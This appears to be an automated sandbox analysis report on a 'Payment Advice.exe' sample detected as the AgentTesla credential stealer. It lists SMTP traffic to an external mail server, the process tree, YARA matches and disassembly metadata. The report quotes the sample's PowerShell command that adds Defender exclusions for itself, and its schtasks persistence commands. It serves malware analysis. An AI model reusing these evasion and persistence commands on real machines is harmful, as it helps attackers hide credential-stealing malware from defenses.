                                                                                    250-PIPECONNECT
                                                                                    250-STARTTLS
                                                                                    250 HELP
                                                                                    Apr 18, 2024 18:29:35.874480963 CEST49771587192.168.2.494.100.26.91STARTTLS
                                                                                    Apr 18, 2024 18:29:36.177504063 CEST5874977194.100.26.91192.168.2.4250-daud.aptcom.info Hello 642294 [81.181.57.52]
                                                                                    250-SIZE 52428800
                                                                                    250-8BITMIME
                                                                                    250-PIPELINING
                                                                                    250-PIPECONNECT
                                                                                    250-STARTTLS
                                                                                    250 HELP
                                                                                    Apr 18, 2024 18:29:36.225358009 CEST5874977194.100.26.91192.168.2.4220 TLS go ahead
                                                                                    Apr 18, 2024 18:29:37.676227093 CEST5874977194.100.26.91192.168.2.4421 daud.aptcom.info lost input connection
                                                                                    Apr 18, 2024 18:29:38.070059061 CEST5874977294.100.26.91192.168.2.4220-daud.aptcom.info ESMTP Exim 4.96.2 #2 Thu, 18 Apr 2024 16:29:37 +0000
                                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                                    220 and/or bulk e-mail.
                                                                                    Apr 18, 2024 18:29:38.070211887 CEST49772587192.168.2.494.100.26.91EHLO 642294
                                                                                    Apr 18, 2024 18:29:38.417752981 CEST5874977294.100.26.91192.168.2.4250-daud.aptcom.info Hello 642294 [81.181.57.52]
                                                                                    250-SIZE 52428800
                                                                                    250-8BITMIME
                                                                                    250-PIPELINING
                                                                                    250-PIPECONNECT
                                                                                    250-STARTTLS
                                                                                    250 HELP
                                                                                    Apr 18, 2024 18:29:38.417949915 CEST49772587192.168.2.494.100.26.91STARTTLS
                                                                                    Apr 18, 2024 18:29:38.727986097 CEST5874977394.100.26.91192.168.2.4220-daud.aptcom.info ESMTP Exim 4.96.2 #2 Thu, 18 Apr 2024 16:29:38 +0000
                                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                                    220 and/or bulk e-mail.
                                                                                    Apr 18, 2024 18:29:38.730680943 CEST49773587192.168.2.494.100.26.91EHLO 642294
                                                                                    Apr 18, 2024 18:29:38.779934883 CEST5874977294.100.26.91192.168.2.4220 TLS go ahead
                                                                                    Apr 18, 2024 18:29:39.084141016 CEST5874977394.100.26.91192.168.2.4250-daud.aptcom.info Hello 642294 [81.181.57.52]
                                                                                    250-SIZE 52428800
                                                                                    250-8BITMIME
                                                                                    250-PIPELINING
                                                                                    250-PIPECONNECT
                                                                                    250-STARTTLS
                                                                                    250 HELP
                                                                                    Apr 18, 2024 18:29:39.084424019 CEST49773587192.168.2.494.100.26.91STARTTLS
                                                                                    Apr 18, 2024 18:29:39.444097042 CEST5874977394.100.26.91192.168.2.4220 TLS go ahead
                                                                                    Apr 18, 2024 18:30:03.636260033 CEST5874977494.100.26.91192.168.2.4220-daud.aptcom.info ESMTP Exim 4.96.2 #2 Thu, 18 Apr 2024 16:30:03 +0000
                                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                                    220 and/or bulk e-mail.
                                                                                    Apr 18, 2024 18:30:03.636413097 CEST49774587192.168.2.494.100.26.91EHLO 642294
                                                                                    Apr 18, 2024 18:30:03.953906059 CEST5874977494.100.26.91192.168.2.4250-daud.aptcom.info Hello 642294 [81.181.57.52]
                                                                                    250-SIZE 52428800
                                                                                    250-8BITMIME
                                                                                    250-PIPELINING
                                                                                    250-PIPECONNECT
                                                                                    250-STARTTLS
                                                                                    250 HELP
                                                                                    Apr 18, 2024 18:30:03.954046965 CEST49774587192.168.2.494.100.26.91STARTTLS
                                                                                    Apr 18, 2024 18:30:04.272480965 CEST5874977494.100.26.91192.168.2.4220 TLS go ahead
                                                                                    Apr 18, 2024 18:30:13.643069029 CEST5874977694.100.26.91192.168.2.4220-daud.aptcom.info ESMTP Exim 4.96.2 #2 Thu, 18 Apr 2024 16:30:13 +0000
                                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                                    220 and/or bulk e-mail.
                                                                                    Apr 18, 2024 18:30:13.643198013 CEST49776587192.168.2.494.100.26.91EHLO 642294
                                                                                    Apr 18, 2024 18:30:13.830807924 CEST5874977594.100.26.91192.168.2.4220-daud.aptcom.info ESMTP Exim 4.96.2 #2 Thu, 18 Apr 2024 16:30:13 +0000
                                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                                    220 and/or bulk e-mail.
                                                                                    Apr 18, 2024 18:30:13.830921888 CEST49775587192.168.2.494.100.26.91EHLO 642294
                                                                                    Apr 18, 2024 18:30:13.969152927 CEST5874977694.100.26.91192.168.2.4250-daud.aptcom.info Hello 642294 [81.181.57.52]
                                                                                    250-SIZE 52428800
                                                                                    250-8BITMIME
                                                                                    250-PIPELINING
                                                                                    250-PIPECONNECT
                                                                                    250-STARTTLS
                                                                                    250 HELP
                                                                                    Apr 18, 2024 18:30:13.969436884 CEST49776587192.168.2.494.100.26.91STARTTLS
                                                                                    Apr 18, 2024 18:30:14.178294897 CEST5874977594.100.26.91192.168.2.4250-daud.aptcom.info Hello 642294 [81.181.57.52]
                                                                                    250-SIZE 52428800
                                                                                    250-8BITMIME
                                                                                    250-PIPELINING
                                                                                    250-PIPECONNECT
                                                                                    250-STARTTLS
                                                                                    250 HELP
                                                                                    Apr 18, 2024 18:30:14.178430080 CEST49775587192.168.2.494.100.26.91STARTTLS
                                                                                    Apr 18, 2024 18:30:14.296186924 CEST5874977694.100.26.91192.168.2.4220 TLS go ahead
                                                                                    Apr 18, 2024 18:30:14.526700020 CEST5874977594.100.26.91192.168.2.4220 TLS go ahead

                                                                                    Statistics

                                                                                    CPU Usage

                                                                                    Click to jump to process

                                                                                    Memory Usage

                                                                                    Click to jump to process

                                                                                    High Level Behavior Distribution

                                                                                    Click to dive into process behavior distribution

                                                                                    Behavior

                                                                                    Click to jump to process

                                                                                    System Behavior

                                                                                    General

                                                                                    Target ID:0
                                                                                    Start time:18:25:56
                                                                                    Start date:18/04/2024
                                                                                    Path:C:\Users\user\Desktop\Payment Advice.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\Payment Advice.exe"
                                                                                    Imagebase:0xa10000
                                                                                    File size:695'304 bytes
                                                                                    MD5 hash:F060B9400A263BEA044A7789EC1D85D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1712393138.0000000004C49000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1712393138.0000000004C49000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:2
                                                                                    Start time:18:25:59
                                                                                    Start date:18/04/2024
                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice.exe"
                                                                                    Imagebase:0x220000
                                                                                    File size:433'152 bytes
                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:3
                                                                                    Start time:18:25:59
                                                                                    Start date:18/04/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:4
                                                                                    Start time:18:25:59
                                                                                    Start date:18/04/2024
                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe"
                                                                                    Imagebase:0x220000
                                                                                    File size:433'152 bytes
                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:5
                                                                                    Start time:18:25:59
                                                                                    Start date:18/04/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:6
                                                                                    Start time:18:25:59
                                                                                    Start date:18/04/2024
                                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\sFPEKzHsLkYZIz" /XML "C:\Users\user\AppData\Local\Temp\tmp6619.tmp"
                                                                                    Imagebase:0x350000
                                                                                    File size:187'904 bytes
                                                                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:7
                                                                                    Start time:18:25:59
                                                                                    Start date:18/04/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:8
                                                                                    Start time:18:26:00
                                                                                    Start date:18/04/2024
                                                                                    Path:C:\Users\user\Desktop\Payment Advice.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\Payment Advice.exe"
                                                                                    Imagebase:0x850000
                                                                                    File size:695'304 bytes
                                                                                    MD5 hash:F060B9400A263BEA044A7789EC1D85D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.4124616083.0000000002D5C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.4124616083.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.4124616083.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.4124616083.0000000002D64000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:low
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:9
                                                                                    Start time:18:26:01
                                                                                    Start date:18/04/2024
                                                                                    Path:C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe
                                                                                    Imagebase:0xd80000
                                                                                    File size:695'304 bytes
                                                                                    MD5 hash:F060B9400A263BEA044A7789EC1D85D9
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.1760226964.0000000004E2A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.1760226964.0000000004E2A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Antivirus matches:
                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                    • Detection: 42%, ReversingLabs
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:10
                                                                                    Start time:18:26:02
                                                                                    Start date:18/04/2024
                                                                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                    Imagebase:0x7ff693ab0000
                                                                                    File size:496'640 bytes
                                                                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:11
                                                                                    Start time:18:26:05
                                                                                    Start date:18/04/2024
                                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\sFPEKzHsLkYZIz" /XML "C:\Users\user\AppData\Local\Temp\tmp7ACA.tmp"
                                                                                    Imagebase:0x350000
                                                                                    File size:187'904 bytes
                                                                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:12
                                                                                    Start time:18:26:05
                                                                                    Start date:18/04/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:13
                                                                                    Start time:18:26:05
                                                                                    Start date:18/04/2024
                                                                                    Path:C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe"
                                                                                    Imagebase:0x530000
                                                                                    File size:695'304 bytes
                                                                                    MD5 hash:F060B9400A263BEA044A7789EC1D85D9
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.4124167230.000000000292B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.4124167230.00000000028E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.4124167230.00000000028E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.4115682058.0000000000431000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.4115682058.0000000000431000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:low
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:14
                                                                                    Start time:18:26:11
                                                                                    Start date:18/04/2024
                                                                                    Path:C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                                                                                    Imagebase:0x180000
                                                                                    File size:695'304 bytes
                                                                                    MD5 hash:F060B9400A263BEA044A7789EC1D85D9
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.1852266538.00000000041C5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.1852266538.00000000041C5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Antivirus matches:
                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                    • Detection: 42%, ReversingLabs
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:16
                                                                                    Start time:18:26:14
                                                                                    Start date:18/04/2024
                                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\sFPEKzHsLkYZIz" /XML "C:\Users\user\AppData\Local\Temp\tmpA082.tmp"
                                                                                    Imagebase:0x350000
                                                                                    File size:187'904 bytes
                                                                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:17
                                                                                    Start time:18:26:14
                                                                                    Start date:18/04/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:18
                                                                                    Start time:18:26:14
                                                                                    Start date:18/04/2024
                                                                                    Path:C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                                                                                    Imagebase:0x3c0000
                                                                                    File size:695'304 bytes
                                                                                    MD5 hash:F060B9400A263BEA044A7789EC1D85D9
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:19
                                                                                    Start time:18:26:14
                                                                                    Start date:18/04/2024
                                                                                    Path:C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                                                                                    Imagebase:0x8d0000
                                                                                    File size:695'304 bytes
                                                                                    MD5 hash:F060B9400A263BEA044A7789EC1D85D9
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000002.4125579074.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000002.4125579074.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000002.4125579074.0000000002DFC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:20
                                                                                    Start time:18:26:21
                                                                                    Start date:18/04/2024
                                                                                    Path:C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                                                                                    Imagebase:0x7a0000
                                                                                    File size:695'304 bytes
                                                                                    MD5 hash:F060B9400A263BEA044A7789EC1D85D9
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.1933792023.0000000003CE4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000014.00000002.1933792023.0000000003CE4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:23
                                                                                    Start time:18:26:22
                                                                                    Start date:18/04/2024
                                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\sFPEKzHsLkYZIz" /XML "C:\Users\user\AppData\Local\Temp\tmpC03F.tmp"
                                                                                    Imagebase:0x350000
                                                                                    File size:187'904 bytes
                                                                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:24
                                                                                    Start time:18:26:22
                                                                                    Start date:18/04/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:25
                                                                                    Start time:18:26:22
                                                                                    Start date:18/04/2024
                                                                                    Path:C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                                                                                    Imagebase:0x800000
                                                                                    File size:695'304 bytes
                                                                                    MD5 hash:F060B9400A263BEA044A7789EC1D85D9
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000019.00000002.4125631218.0000000002D9B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000019.00000002.4125631218.0000000002D9B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Has exited:false

                                                                                    Disassembly

                                                                                    Reset < >

                                                                                      Execution Graph

                                                                                      Execution Coverage:6.7%
                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                      Signature Coverage:0%
                                                                                      Total number of Nodes:33
                                                                                      Total number of Limit Nodes:4
                                                                                      execution_graph 39519 149dd88 39520 149dd9c 39519->39520 39522 149ddc1 39520->39522 39523 149cea8 39520->39523 39524 149df48 LoadLibraryExW 39523->39524 39526 149dfc1 39524->39526 39526->39522 39527 5561d12 39528 5561d25 39527->39528 39531 5561d45 39528->39531 39532 5c85f98 39528->39532 39539 5c85fa8 39528->39539 39533 5c85fcc 39532->39533 39534 5c85fd3 39532->39534 39533->39531 39538 5c85ffa 39534->39538 39546 5c83bbc 39534->39546 39536 5c85ff0 39537 5c83bbc GetCurrentThreadId 39536->39537 39537->39538 39538->39531 39540 5c85fcc 39539->39540 39541 5c85fd3 39539->39541 39540->39531 39542 5c83bbc GetCurrentThreadId 39541->39542 39545 5c85ffa 39541->39545 39543 5c85ff0 39542->39543 39544 5c83bbc GetCurrentThreadId 39543->39544 39544->39545 39545->39531 39547 5c83bc7 39546->39547 39548 5c86310 GetCurrentThreadId 39547->39548 39549 5c862fa 39547->39549 39548->39549 39549->39536 39554 149dce0 39555 149dd28 GetModuleHandleW 39554->39555 39556 149dd22 39554->39556 39557 149dd55 39555->39557 39556->39555 39550 556da18 39551 556da66 DrawTextExW 39550->39551 39553 556dabe 39551->39553

                                                                                      Executed Functions

                                                                                      Function 05C8E070 Relevance: 4.0, Strings: 3, Instructions: 201COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 649 5c8e070-5c8e093 650 5c8e09a-5c8e110 649->650 651 5c8e095 649->651 656 5c8e113 650->656 651->650 657 5c8e11a-5c8e136 656->657 658 5c8e138 657->658 659 5c8e13f-5c8e140 657->659 658->656 658->659 660 5c8e15c-5c8e17a call 5c8e8f8 658->660 661 5c8e28e-5c8e2fe call 5c89544 658->661 662 5c8e1a0-5c8e1a4 658->662 663 5c8e1d0-5c8e1e2 658->663 664 5c8e251-5c8e26d 658->664 665 5c8e272-5c8e289 658->665 666 5c8e145-5c8e15a 658->666 667 5c8e216-5c8e24c 658->667 668 5c8e1e7-5c8e211 658->668 659->661 678 5c8e180-5c8e19b 660->678 683 5c8e300 call 77a0c7e 661->683 684 5c8e300 call 77a063c 661->684 685 5c8e300 call 77a0040 661->685 686 5c8e300 call 77a0007 661->686 687 5c8e300 call 77a0cf7 661->687 688 5c8e300 call 77a05c4 661->688 669 5c8e1a6-5c8e1b5 662->669 670 5c8e1b7-5c8e1be 662->670 663->657 664->657 665->657 666->657 667->657 668->657 672 5c8e1c5-5c8e1cb 669->672 670->672 672->657 678->657 682 5c8e306-5c8e310 683->682 684->682 685->682 686->682 687->682 688->682
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1718316976.0000000005C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_5c80000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Te^q$Te^q$)"
                                                                                      • API String ID: 0-4031938444
                                                                                      • Opcode ID: 05b045a86d66d814fd62d863d14705d4c479a84376641959b1e5a2dd46ec6b6a
                                                                                      • Instruction ID: fd8804fbf880ad3a40a37ec6dd2b701cf61e97d239a53333d49af6f4d45685f8
                                                                                      • Opcode Fuzzy Hash: 05b045a86d66d814fd62d863d14705d4c479a84376641959b1e5a2dd46ec6b6a
                                                                                      • Instruction Fuzzy Hash: E281C474E042098FDB48DFAAC984AEEFBB6FF88310F14952AD415AB354DB34A905CF54
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 05C8E8F8 Relevance: 3.9, Strings: 3, Instructions: 155COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 690 5c8e8f8-5c8e919 691 5c8e91b 690->691 692 5c8e920-5c8e945 690->692 691->692 693 5c8e94c-5c8e958 692->693 694 5c8e947 692->694 695 5c8e95b 693->695 694->693 696 5c8e962-5c8e97e 695->696 697 5c8e980 696->697 698 5c8e987-5c8e988 696->698 697->695 697->698 699 5c8eafa-5c8eafe 697->699 700 5c8ea6a-5c8ea81 697->700 701 5c8ea1a-5c8ea21 697->701 702 5c8eabb-5c8ead9 697->702 703 5c8e98d-5c8e993 697->703 704 5c8e9dd-5c8e9fb 697->704 705 5c8eade-5c8eaf5 697->705 706 5c8e9b0-5c8e9b4 697->706 707 5c8ea00-5c8ea15 697->707 708 5c8ea86-5c8ea90 697->708 698->699 700->696 709 5c8ea28-5c8ea65 701->709 710 5c8ea23 701->710 702->696 719 5c8e996 call 5c8ed58 703->719 720 5c8e996 call 5c8ed68 703->720 704->696 705->696 713 5c8e9b6-5c8e9c5 706->713 714 5c8e9c7-5c8e9ce 706->714 707->696 711 5c8ea92 708->711 712 5c8ea97-5c8eab6 708->712 709->696 710->709 711->712 712->696 715 5c8e9d5-5c8e9db 713->715 714->715 715->696 718 5c8e99c-5c8e9ae 718->696 719->718 720->718
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1718316976.0000000005C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
